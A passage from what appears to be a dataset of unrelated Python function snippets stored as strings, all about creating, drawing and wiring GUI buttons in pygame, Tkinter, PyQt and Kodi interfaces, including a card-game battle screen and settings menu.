('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'easy-shot' in screen_status.battle_screen_action_indicator)\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'tricky-shot' in screen_status.battle_screen_action_indicator)\n or 'stage-3-monster-' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-easy-shot' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tricky-shot' in screen_status.battle_screen_action_indicator\n ):\n if button_status.battle_screen_player1_battleground_indicator_display == True:\n if int(button_status.battle_screen_player1_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 650\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif int(button_status.battle_screen_player1_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player1_battleground_indicator_position)\n monster_rect_x = 825\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n\n if button_status.battle_screen_player2_battleground_indicator_display == True:\n if int(button_status.battle_screen_player2_battleground_indicator_position) <= 3:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 420\n monster_rect_y = 220 + 110*(i-1)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)\n elif int(button_status.battle_screen_player2_battleground_indicator_position) <= 6:\n i = int(button_status.battle_screen_player2_battleground_indicator_position)\n monster_rect_x = 245\n monster_rect_y = 220 + 110*(i-4)\n button = Button('***','', (70,70,150),monster_rect_x + 50, monster_rect_y - 27, 30, 27)\n button.update()\n button.draw(screen)", "def on_pushButton_clicked(self):\r\n # TODO: not implemented yet\r\n print 1", "def add_button(self):\n if len(self.datamodels) == 0:#In this case the button is deleted completely as there is no reference to it\n self.addDataDisplays = QtGui.QPushButton(self) #Draw (+) button to add data displays\n self.addDataDisplays.setText(\"+\")\n self.addDataDisplays.clicked.connect(self.add_data_display)\n self.verticalLayout.removeWidget(self.addDataDisplays)\n self.verticalLayout.addWidget(self.addDataDisplays)", "def show_buttons(self):\n for button in self.buttons:\n x = button.starting_x\n y = button.starting_y\n self.screen.fill(button.color, ((x, y), (button.width, button.height)))", "def add_side_buttons(self):\n # Top and bottom buttons\n for col in range(self._grid.width):\n top_button = widgets.HExitButton('^', -1, col)\n bottom_button = widgets.HExitButton('v', self._grid.height, col)\n self._graphic_grid.addWidget(top_button, 1, 2 + col)\n self._graphic_grid.addWidget(bottom_button,\n 2 + self._grid.height, 2 + col)\n top_button.clicked.connect(self.button_clicked)\n bottom_button.clicked.connect(self.button_clicked)\n # Left and right buttons\n for row in range(self._grid.height):\n left_button = widgets.VExitButton('<', row, -1)\n right_button = widgets.VExitButton('>', row, self._grid.width)\n self._graphic_grid.addWidget(left_button, 2 + row, 1)\n self._graphic_grid.addWidget(right_button,\n 2 + row, 2 + self._grid.width)\n left_button.clicked.connect(self.button_clicked)\n right_button.clicked.connect(self.button_clicked)", "def show_text_in_buttons(self):\n for button in self.buttons:\n self.screen.blit(button.rendered_text, button.get_text_position())", "def show_control_buttons(self):\n self.settings_button.show()\n self.radio_button.show()\n self.blank_button.show()\n self.close_button.show()", "def battle_screen_menu_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if button_status.battle_screen_menu_display == True:\n\n button = Button('','', (0,0,0), 580, 30, 420, 340, alpha = 200)\n button.update()\n button.draw(screen)\n # Sound settings\n button_sound = Button('Sound: ','', (0,0,0), 601, 51, 105, 35, font_size = 28, alpha = 0)\n button_sound.update()\n button_sound.draw(screen)\n\n if ai_settings.sound_indicator == True:\n button_1 = Button('On','', (50,150,50), 447+280, 323-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 482+280, 323-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 447+280, 323-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 482+280, 323-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n\n # Music settings\n button_music = Button('Music: ','', (0,0,0), 321+280, 370-270, 105, 35, font_size = 28, alpha = 0)\n button_music.update()\n button_music.draw(screen)\n\n if ai_settings.music_indicator == True:\n button_1 = Button('On','', (50,150,50), 447+280, 372-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 482+280, 372-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 447+280, 372-270, 28, 28)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 482+280, 372-270, 28, 28)\n button_2.update()\n button_2.draw(screen)\n\n # Theme settings\n button_theme = Button('Theme: ','', (0,0,0), 321+280, 419-270, 112, 35, font_size = 28, alpha = 0)\n button_theme.update()\n button_theme.draw(screen)\n\n if ai_settings.theme_indicator == 'Lith Harbor':\n button_1 = Button('Lith Harbor','', (50,150,50), 447+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Lith Harbor','', (150,150,150), 447+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Leafre':\n button_1 = Button('Leafre','', (50,150,50), 559+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Leafre','', (150,150,150), 559+280, 419-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Pantheon':\n button_1 = Button('Pantheon','', (50,150,50), 447+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Pantheon','', (150,150,150), 447+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Ellinia':\n button_1 = Button('Ellinia','', (50,150,50), 559+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Ellinia','', (150,150,150), 559+280, 468-270, 98, 35, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n # AI speeding settings\n button_ai_speed = Button('AI Speed: ','', (0,0,0), 321+280, 524-270, 140, 35, font_size = 28, alpha = 0)\n button_ai_speed.update()\n button_ai_speed.draw(screen)\n\n if ai_settings.AI_speed_indicator == '1000':\n button_1 = Button('Fast','', (50,150,50), 475+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Fast','', (150,150,150), 475+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '2000':\n button_1 = Button('Normal','', (50,150,50), 545+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Normal','', (150,150,150), 545+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '3000':\n button_1 = Button('Slow','', (50,150,50), 615+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Slow','', (150,150,150), 615+280, 524-270, 56, 35, font_size = 15)\n button_1.update()\n button_1.draw(screen)\n\n # Closed settings window button\n button_1 = Button('X','', (250,100,100), 699+280, 300-270, 21, 21, font_size = 16)\n button_1.update()\n button_1.draw(screen)\n\n\n button_1 = Button('Concede and Quit!','', (170,70,70), 700, 310, 180, 40)\n button_1.update()\n button_1.draw(screen)", "def battle_screen_stable_button_display(ai_settings,grid, screen, buttons, screen_status, button_status, card_database_filter, user, player2):\n button_1 = Button('Rules','', (250,250,250),200, 0, 50, 30, font_color = (0,0,0), alpha = 150)\n button_1.update()\n button_1.draw(screen)\n # menu\n button_menu = Button('Menu','', (250,250,250),950, 0, 50, 30, font_color = (0,0,0), alpha = 150)\n button_menu.update()\n button_menu.draw(screen)\n # Display user name\n button2 = Button(user.name,'', (250,250,250),1110, 570, 90, 30, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n # Display opponent's name\n if player2.character_ai_index == '1':\n player2_AI = 'NIXIE'\n elif player2.character_ai_index == '2':\n player2_AI = 'MAYA'\n elif player2.character_ai_index == '3':\n player2_AI = 'IVAN'\n elif player2.character_ai_index == '4':\n player2_AI = 'SHERMAN'\n elif player2.character_ai_index == '5':\n player2_AI = 'MOBY'\n elif player2.character_ai_index == '6':\n player2_AI = 'MAHIBANG'\n elif player2.character_ai_index == '7':\n player2_AI = 'MISTMOON'\n elif player2.character_ai_index == '8':\n player2_AI = 'FANGBLADE'\n elif player2.identity == 'pvp':\n player2_AI = player2.name\n try:\n button2 = Button(player2_AI,'', (250,250,250),0, 570, 90, 30, font_color = (0,0,0), alpha = 150)\n button2.update()\n button2.draw(screen)\n except UnboundLocalError:\n pass\n # add menu button to buttons group\n if button_status.battle_screen_stable_button_backend:\n buttons.append(button_menu)\n button_status.battle_screen_stable_button_backend = False", "def addButton(self, which, type_=\"move\", v=None, parent=None):\n c = self.c\n p = c.p\n if v is None:\n v = p.v\n sc = scriptingController(c)\n mb = quickMoveButton(self, v, which, type_=type_)\n txt = self.txts[type_]\n\n if parent: # find parent button\n for i in self.buttons:\n if i[0].target.gnx == parent:\n parent = i[1]\n break\n else:\n g.es('Move to button parent not found, placing at top level')\n parent = None\n\n header = v.anyAtFileNodeName() or v.h # drop @auto etc.\n\n text = txt + \":\" + header if txt else header\n # createButton truncates text.\n\n\n if parent and g.app.gui.guiName().startswith(\"qt\"):\n pb = parent.button\n rc = QAction(text, pb)\n rc.triggered.connect(mb.moveCurrentNodeToTarget)\n pb.insertAction(pb.actions()[0], rc) # insert at top\n b = None\n mb.has_parent = True\n # New code.\n t = c.config.getString('mod-scripting-subtext') or ''\n t2 = pb.text()\n if not t.endswith(t):\n pb.setText(t2 + t)\n else:\n b = sc.createIconButton(\n args=None,\n text=text,\n command = mb.moveCurrentNodeToTarget,\n statusLine='%s current node to %s child of %s' % (\n type_.title(), which, v.h),\n kind=\"quick-move\"\n )\n if g.app.gui.guiName() == \"qt\":\n\n def cb_goto_target(checked, c=c, v=v):\n p = c.vnode2position(v)\n c.selectPosition(p)\n c.redraw()\n\n def cb_set_parent(checked, c=c, v=v, first=which, type_=type_):\n c.quickMove.set_parent(v, first, type_)\n\n def cb_permanent(checked, c=c, v=v, type_=type_, first=which):\n c.quickMove.permanentButton(v=v, type_=type_, first=first)\n\n # def cb_clear(event=None, c=c, v=v):\n # c.quickMove.clearButton(v)\n\n for cb, txt in [\n (cb_goto_target, 'Goto target'),\n (cb_permanent, 'Make permanent'),\n # (cb_clear, 'Clear permanent'),\n (cb_set_parent, 'Set parent'),\n ]:\n but = b.button\n rc = QAction(txt, but)\n rc.triggered.connect(cb) # type:ignore\n # insert rc before Remove Button\n but.insertAction(but.actions()[-1], rc)\n\n self.buttons.append((mb, b))", "def buttonPress(self, argv):\n self.entry.insert(END, argv)", "def create_play_button(self):\n play_button = Button(self.littleFrame, text=\"Rejouer\", font=(\"Arial\", 25), bg='white', relief='groove',\n fg='lightblue',\n command=self.start_game, width=8, activebackground='white',\n activeforeground='lightblue')\n play_button.grid(column=0, row=0)\n invisible_widget = Label(self.littleFrame, text=\" \", bg=\"lightblue\")\n invisible_widget.grid(column=1, row=0)", "def prepare_screen_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n for i in range(1,7):\n if user.deck_list_index == str(i):\n button_edit = Button('Edit','', (50,50,170),85 + 180* (i-1), 282, 60, 30)\n button_edit.update()\n button_edit.draw(screen)\n\n button_delete = Button('Delete','', (160,30,30), 155 + 180* (i-1), 282, 60, 30)\n button_delete.update()\n button_delete.draw(screen)\n\n # Red rectangle around opponent card\n for i in range(1,9):\n if player2.character_ai_index == str(i):\n if i <= 4:\n button_top = Button('','', (250,0,0), 65 + 160*(i-1), 390, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),65 + 160*(i-1), 575, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0), 65 + 160*(i-1), 395, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0), 200 + 160*(i-1), 395, 5, 180)\n button_right.update()\n button_right.draw(screen)\n else:\n button_top = Button('','', (250,0,0), 65 + 160*(i-5), 580, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),65 + 160*(i-5), 765, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0), 65 + 160*(i-5), 585, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0), 200 + 160*(i-5), 585, 5, 180)\n button_right.update()\n button_right.draw(screen)", "def display_next_command( self, event ):\n if self.command_history_index < len( self.command_history ) - 1:\n self.command_history_index += 1\n self.delete( 0, tk.END )\n self.insert( 0, self.command_history[ self.command_history_index ] )", "def add_player_button():\r\n global state\r\n if not state == \"add\":\r\n clear_frames()\r\n\r\n \"\"\"Changing state global variable and subtitle and showing on screen\"\"\"\r\n state = \"add\"\r\n sub_title[\"text\"] = \"ADD PLAYER\"\r\n sub_title.pack()\r\n \"\"\"Create a new frame for showing the widgets that are specific for\r\n this form\"\"\"\r\n frame_buttons = create_frame()\r\n \"\"\"Adding all the widgets\"\"\"\r\n # Creating font for labels\r\n label_font = tkinter.font.Font(family='Arial', size=10)\r\n name = Label(frame_buttons[0], text=\"name: \", font=label_font)\r\n name.pack(fill=X)\r\n name_entry = Entry(frame_buttons[0], width=25, font=label_font)\r\n name_entry.focus()\r\n name_entry.pack()\r\n\r\n nickname = Label(frame_buttons[0], text=\"nickname: \", font=label_font)\r\n nickname.pack(fill=X)\r\n nickname_entry = Entry(frame_buttons[0], width=25, font=label_font)\r\n nickname_entry.pack()\r\n\r\n elo = Label(frame_buttons[0], text=\"elo: \", font=label_font)\r\n elo.pack(fill=X)\r\n variable1 = StringVar(frame_buttons[0])\r\n variable1.set(\"bronze 5\")\r\n elo_menu = OptionMenu(frame_buttons[0], variable1, \"unranked\", \"bronze 5\", \"bronze 4\", \"bronze 3\", \"bronze 2\",\r\n \"bronze 1\",\r\n \"silver 5\", \"silver 4\", \"silver 3\", \"silver 2\", \"silver 1\", \"gold 5\", \"gold 4\",\r\n \"gold 3\", \"gold 2\", \"gold 1\", \"platinum 5\", \"platinum 4\", \"platinum 3\", \"platinum 2\",\r\n \"platinum 1\", \"diamond 5\", \"diamond 4\", \"diamond 3\", \"diamond 2\", \"diamond 1\",\r\n \"master\", \"challenger\")\r\n elo_menu[\"font\"] = label_font\r\n elo_menu.pack(fill=X)\r\n\r\n first_role = Label(frame_buttons[0], text=\"first role: \", font=label_font)\r\n first_role.pack(fill=X)\r\n variable2 = StringVar(frame_buttons[0])\r\n variable2.set(\"Top Laner\")\r\n first_role_menu = OptionMenu(frame_buttons[0], variable2, \"Top Laner\", \"Jungler\", \"Mid Laner\",\r\n \"Adc or BottomCarry\", \"Support\")\r\n first_role_menu[\"font\"] = label_font\r\n first_role_menu.pack(fill=X)\r\n\r\n second_role = Label(frame_buttons[0], text=\"second role: \", font=label_font)\r\n second_role.pack(fill=X)\r\n variable3 = StringVar(frame_buttons[0])\r\n variable3.set(\"Jungler\")\r\n second_role_menu = OptionMenu(frame_buttons[0], variable3, \"Top Laner\", \"Jungler\", \"Mid Laner\",\r\n \"Adc or BottomCarry\", \"Support\")\r\n second_role_menu[\"font\"] = label_font\r\n second_role_menu.pack(fill=X)\r\n\r\n send_button = Button(frame_buttons[0], text=\"Save\", bg=\"dodgerblue2\", bd=10, fg='white', font=label_font)\r\n send_button[\"command\"] = partial(save_player, variable1, variable2, variable3, frame_buttons[0])\r\n send_button.pack(fill=X, padx=10, pady=10)", "def _state_main(self, gui):\n gui.pack_button.wait_variable(gui.buttons_on)", "def _state_main(self, gui):\n gui.pack_button.wait_variable(gui.buttons_on)", "def update_buttons(self):\n # Enable the Add/Remove/Up/Down measurements buttons if a Survey is loaded\n enable = self.mgr.obj is not None\n self.addButton.setEnabled(enable)\n self.removeButton.setEnabled(enable)\n self.upButton.setEnabled(enable)\n self.downButton.setEnabled(enable)\n \n # Enable the Add/Remove condition buttons if a Measurement is selected\n #enable = len(list(self.mgr.obj.measurements)) > 0\n enable = self.measurementTableWidget.rowCount() > 0\n self.addConditionButton.setEnabled(enable)\n self.removeConditionButton.setEnabled(enable)", "def create_buttons(self):\r\n return []", "def addButton(self, button):\n\t\tself.config._WITH_ACTIONS = True\n\t\tself.config.ACTIONS.append((\"button\", button))", "def add_NextButton(self):\n next_button = Button(text=\"Next\", font_size =\"20sp\", background_color =(1, 1, 1, 1), color =(1, 1, 1, 1), size =(32, 32), size_hint =(.3, .3)) #, pos =(300, 250)\n next_button.bind(on_release = lambda a : self.next_button_handler())\n self.layout.add_widget(next_button)", "def draw_buttons(self):\n for button in self.playing_buttons:\n button.draw(self.screen)", "def cb_something_2(self, button):\n print(\"Do Something 2\")", "def cb_something_3(self, button):\n print(\"Do Something 3\")", "def add_button(self, title, callback, display_opt=None):\n button = wx.Button(self.button_panel, -1, title)\n button.Bind(wx.EVT_BUTTON, callback)\n button.display_opt = display_opt\n self.buttons.append(button)\n self.button_sizer.Add(button, 0)", "def set_controls(self):\n # Image tnds\n image = pyxbmct.Image(addonfolder+artsfolder+'/tnds82.png')\n self.placeControl(image, 0, 0, rowspan=8, columnspan=16)\n\n\t\t# Image Welcome\n image = pyxbmct.Image(addonfolder+artsfolder+'/start.png')\n self.placeControl(image, 8, 4, rowspan=2, columnspan=8)\n\t\t\n\t\t# YES button\n self.yes_button = pyxbmct.Button('YES')\n self.placeControl(self.yes_button, 11, 6, rowspan=1, columnspan=2)\n self.connect(self.yes_button, lambda: self.page(OSCam))\n\n\t\t# NO button\n self.no_button = pyxbmct.Button('NO')\n self.placeControl(self.no_button, 11, 8, rowspan=1, columnspan=2)\n self.connect(self.no_button, lambda: self.page(Tvheadend))\n\n\t\t# Close button\n self.close_button = pyxbmct.Button('Exit')\n self.placeControl(self.close_button, 13, 15, rowspan=1, columnspan=1)\n self.connect(self.close_button, lambda: self.closepage())", "def on_pushButton_9_clicked(self):\n # TODO: not implemented yet\n raise NotImplementedError", "def makeButtons(self):\n self.but_run = QtWidgets.QPushButton('Run') \n self.but_status = QtWidgets.QPushButton('Status') \n self.but_brow = QtWidgets.QPushButton('View') \n self.but_remove = QtWidgets.QPushButton('Remove files') \n\n self.hboxB = QtWidgets.QHBoxLayout()\n self.hboxB.addWidget(self.but_run)\n self.hboxB.addWidget(self.but_status)\n self.hboxB.addWidget(self.but_brow)\n self.hboxB.addStretch(1) \n self.hboxB.addWidget(self.but_remove)\n\n self.but_run.clicked.connect(self.onRun)\n self.but_status.clicked.connect(self.onStatus)\n self.but_brow.clicked.connect(self.onBrow)\n self.but_remove.clicked.connect(self.onRemove)", "def paintButtons(self):\n\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_OK)\n buttonOK = guiobjects.OcempImageButtonTransparent(imgPath, self.buttonTooltips[\"ok\"], self.showTooltip, self.removeTooltip)\n buttonOK.topleft = [770, 30]\n buttonOK.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.changeConfiguration)\n self.window.add_child(buttonOK)\n\n imgPath = GG.genteguada.GenteGuada.getInstance().getDataPath(BUTTON_CANCEL)\n buttonCancel = guiobjects.OcempImageButtonTransparent(imgPath, self.buttonTooltips[\"cancel\"], self.showTooltip, self.removeTooltip)\n buttonCancel.topleft = [890, 30]\n buttonCancel.connect_signal(ocempgui.widgets.Constants.SIG_CLICKED, self.closeConfiguration)\n self.window.add_child(buttonCancel)", "def after_record(self):\n self.record_label.set(\"Re-Record\")\n self.button_2['state'] = \"normal\"", "def show_give_buttons(self):\n #\n # Show the give buttons, but only if we have some water\n if self.vessel.value > 0:\n self.log.debug('Showing give buttons with vessel water at {0}'.format(self.water_container.amount))\n for panel in self.health_panels.values():\n panel.show_button()", "def add_another(self):\n message = qtw.QMessageBox(qtw.QMessageBox.information, 'Albums', \"Album added\",\n buttons=qtw.QMessageBox.Ok, parent=self)\n message.setDefaultButton(qtw.QMessageBox.Ok)\n message.setEscapeButton(qtw.QMessageBox.Ok)\n next_button = create_next_button(message)\n message.exec_()\n if message.clickedButton() == next_button:\n self.parent().do_new(keep_sel=self.keep_sel)", "def cb_something_4(self, button): \n print(\"Do Something 4\")", "def add_view_songs_btn(self):\n self.view_songs = QPushButton(\"View Songs\")\n self.view_songs.clicked.connect(self.view_songs_push)\n self.hbtnbox.addWidget(self.view_songs)", "def cb_something_1(self, button):\n print(\"Do Something 1\")", "def enable(self): \n self.feed_button.config(state=\"normal\")\n self.eat_button.config(state=\"normal\") \n for t in range(self.player.game.trait_limit): \n self.add_trait_buttons[t].config(state=\"normal\") \n self.add_population_button.config(state=\"normal\")\n self.add_body_size_button.config(state=\"normal\")", "def addToolBarButtons(self):", "def rules_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if button_status.rules_display == True:\n button = Button('','', (0,0,0), 0, 0, 1200, 800, alpha = 100)\n button.update()\n button.draw(screen)\n\n button = Button('','', (255,255,255), 200, 35, 800, 730)\n button.update()\n button.draw(screen)\n\n if button_status.rules_page_id == '1':\n screen.blit(pygame.image.load('static/rules_images/001.png'), (200,65))\n\n button = Button('>','', (255,255,255), 640, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n elif button_status.rules_page_id == '2':\n screen.blit(pygame.image.load('static/rules_images/002.png'), (200,65))\n\n button = Button('<','', (255,255,255), 540, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('>','', (255,255,255), 640, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n elif button_status.rules_page_id == '3':\n screen.blit(pygame.image.load('static/rules_images/003.png'), (200,65))\n\n button = Button('<','', (255,255,255), 540, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('>','', (255,255,255), 640, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n elif button_status.rules_page_id == '4':\n screen.blit(pygame.image.load('static/rules_images/004.png'), (200,65))\n\n button = Button('<','', (255,255,255), 540, 37, 20, 20, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('Page: '+button_status.rules_page_id,'', (255,255,255), 570, 35, 60, 30, font_color = (0,0,0))\n button.update()\n button.draw(screen)\n\n button = Button('X','', (250,100,100), 975, 35, 25, 25, font_size = 16)\n button.update()\n button.draw(screen)", "def update(self):\n for (x, y) in self.board.fields:\n text = self.board.fields[x, y]\n self.buttons[x, y]['text'] = text\n self.buttons[x, y]['disabledforeground'] = 'black'\n if text == self.board.empty:\n self.buttons[x, y]['state'] = 'normal'\n else:\n self.buttons[x, y]['state'] = 'disabled'\n winning = self.board.won()\n if winning:\n for x, y in winning:\n self.buttons[x, y]['disabledforeground'] = 'red'\n for x, y in self.buttons:\n self.buttons[x, y]['state'] = 'disabled'\n for (x, y) in self.board.fields:\n self.buttons[x, y].update()", "def btn_follow_clicked(self, widget, data=None):\n print \"follow clicked\"\n #Going to put random stuff here.", "def __add_mode_button(self):\n btn_text = self.__toggle_button_text_dict.get(\n self.__ui_mode, \"Unknown Mode Set\")\n btn_text = \"<span style='font-size:20px;'>\" + btn_text + \"</span>\"\n\n btn_toggle = button(bind=self.__toggle_mode, text=btn_text)\n self.__ui_controls.btn_toggle = btn_toggle\n self.scene.append_to_caption('\\n')", "def buttonbox(self):\n if(self.box is not None):\n self.box.destroy()\n\n self.box = Frame(self)\n\n ok_btn = Button(self.box, text=\"Next Player\", width=10,\n command=self.next_cmd, default=ACTIVE)\n ok_btn.pack(side=LEFT, padx=5, pady=5)\n\n finish_btn = Button(self.box, text=\"Ready\",\n state=DISABLED, width=10, command=self.finish_command, default=ACTIVE)\n # ensures a minimum of 2 players\n if self.num_players >= self.min_players:\n finish_btn.config(state=\"normal\")\n finish_btn.pack(side=LEFT, padx=5, pady=5)\n\n cancel_btn = Button(self.box, text=\"Cancel\",\n width=10, command=self.cancel)\n cancel_btn.pack(side=LEFT, padx=5, pady=5)\n\n self.bind(\"<Escape>\", self.cancel)\n\n self.box.pack()", "def set_navigation(self):\n self.close_button.controlUp(self.k1plus_button)\n self.k1plus_button.controlDown(self.k1pro_button)\n self.k1pro_button.controlDown(self.close_button)\n self.k2pro_button.controlDown(self.k1pro_button)\n self.k3pro_button.controlDown(self.k1pro_button)\n self.k1pro_button.controlUp(self.k2pro_button)\n self.k1plus_button.controlRight(self.k2pro_button)\n self.k2pro_button.controlRight(self.k3pro_button)\n self.k3pro_button.controlLeft(self.k2pro_button)\n self.k3pro_button.controlRight(self.k1pro_button)\n self.k2pro_button.controlLeft(self.k1plus_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)", "def add_button_and_label(self):\n\n font_of_label = QFont()\n font_of_label.setFamily(\"Times\")\n font_of_label.setPixelSize(35)\n\n font_of_button = QFont()\n font_of_button.setFamily(\"Times\")\n font_of_button.setPixelSize(55)\n\n # //-label\n self.ECG.setFont(font_of_label)\n self.SpO2.setFont(font_of_label)\n self.PulseWave.setFont(font_of_label)\n self.Respiration.setFont(font_of_label)\n\n # //-button\n self.save.setFixedSize(240, 120)\n self.save.setFont(font_of_button)\n self.clear.setFixedSize(240, 120)\n self.clear.setFont(font_of_button)\n self.receive.setFixedSize(240, 120)\n self.receive.setFont(font_of_button)\n self.exit.setFixedSize(240, 120)\n self.exit.setFont(font_of_button)\n\n self.ECG.setText(\"心电\")\n self.SpO2.setText(\"血氧\")\n self.PulseWave.setText(\"脉搏\")\n self.Respiration.setText(\"呼吸\")\n self.save.setText(\"保存\")\n self.clear.setText(\"清除\")\n self.receive.setText(\"接收\")\n self.exit.setText(\"返回\")\n\n self.save.clicked.connect(self.slot_save)\n self.clear.clicked.connect(self.slot_clear)\n self.receive.clicked.connect(self.slot_receive)\n self.exit.clicked.connect(self.close_win)", "def display(self) -> None:\n # ask info to display to controller\n self.list_matches = ct.Controls.get_current_matches()\n for elem in self.list_matches: # setup the data to be displayed\n p1 = str(elem.player1)\n p2 = str(elem.player2)\n match = p1 + ' vs ' + p2\n self.lignes.append({'match_instance': elem, 'label': match, 'choice': ['match nul', p1, p2],\n 'result': None})\n for index, elem in enumerate(self.lignes): # display the data\n self.widgets.append(self.my_simple_line(self.master, elem['label'], index + 1, 0, 1, 1, 10, 10))\n elem['result'], menu_option = self.my_option_menu(self.master, elem['choice'], index + 1, 1, 1, 1, 10, 10)\n self.widgets.append(menu_option)\n # display the button to go through next step of tournament\n self.widgets.append(self.my_button(self.master, 'Clôturer ce tour', 0, len(self.lignes) + 1, self.save_scores))", "def set_navigation(self):\n self.close_button.controlUp(self.wplnb1_button)\n self.wplnb1_button.controlRight(self.wplnb2_button)\n self.wplnb2_button.controlRight(self.wplnboth_button)\n self.wplnb1_button.controlDown(self.close_button)\n self.wplnb2_button.controlDown(self.close_button)\n self.wplnboth_button.controlDown(self.close_button)\n self.wplnb1_button.controlLeft(self.wplnboth_button) \n self.wplnb2_button.controlLeft(self.wplnb1_button) \n self.wplnboth_button.controlLeft(self.wplnb2_button)\n self.wplnboth_button.controlRight(self.wplnb1_button)\n\t # Set initial focus.\n self.setFocus(self.close_button)", "def on_step_up_rcr_btn_clicked(self):\n self.status = 'up'\n status_txt = \"step \" + self.status\n self.set_status_txt(status_txt)\n self.control1.device.cmd_move(self.status)\n # self.set_ab_height()", "def _on_gui_event(self): \n pos = self.last_gui_position\n button = self.get_object_id(pos)\n next_state = self.sm.state \n \n if button == self.buttons.BARCODE:\n self.barcode = \"\"\n self.set_active_entry(self.buttons.BARCODE)\n self._request_redraw()\n next_state = self.states.BARCODE\n\n if button == self.buttons.DESCRIPTION:\n self.description = \"\"\n self.set_active_entry(self.buttons.DESCRIPTION)\n self._request_redraw()\n next_state = self.states.DESCRIPTION\n\n if button == self.buttons.PRICE:\n self.price = 0\n self.set_active_entry(self.buttons.PRICE)\n self._request_redraw()\n next_state = self.states.PRICE\n\n if button == self.buttons.DONE:\n if self.data_ready():\n self.add_product()\n next_state = self.states.ADDING\n else:\n self.set_banner_with_timeout(\"One or more entries not valid!\", 4, Colours.WARN, self._banner_timeout)\n self._request_redraw()\n next_state = self.states.WARNING\n\n if button == self.buttons.CANCEL:\n self._exit()\n next_state = self.states.BARCODE\n\n #No GUI object hit:\n return next_state", "def lobby_screen_pick_deck_warning_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n if button_status.lobby_screen_end_screen_warning_button_display == 'deck less than 40 cards':\n button = Button('You need at least 40','' ,(122,33,38),1050, 580, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('cards in your deck!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.lobby_screen_end_screen_warning_button_display == 'no deck':\n button = Button('Please pick a deck','' ,(122,33,38),1050, 580, 150, 30,font_size 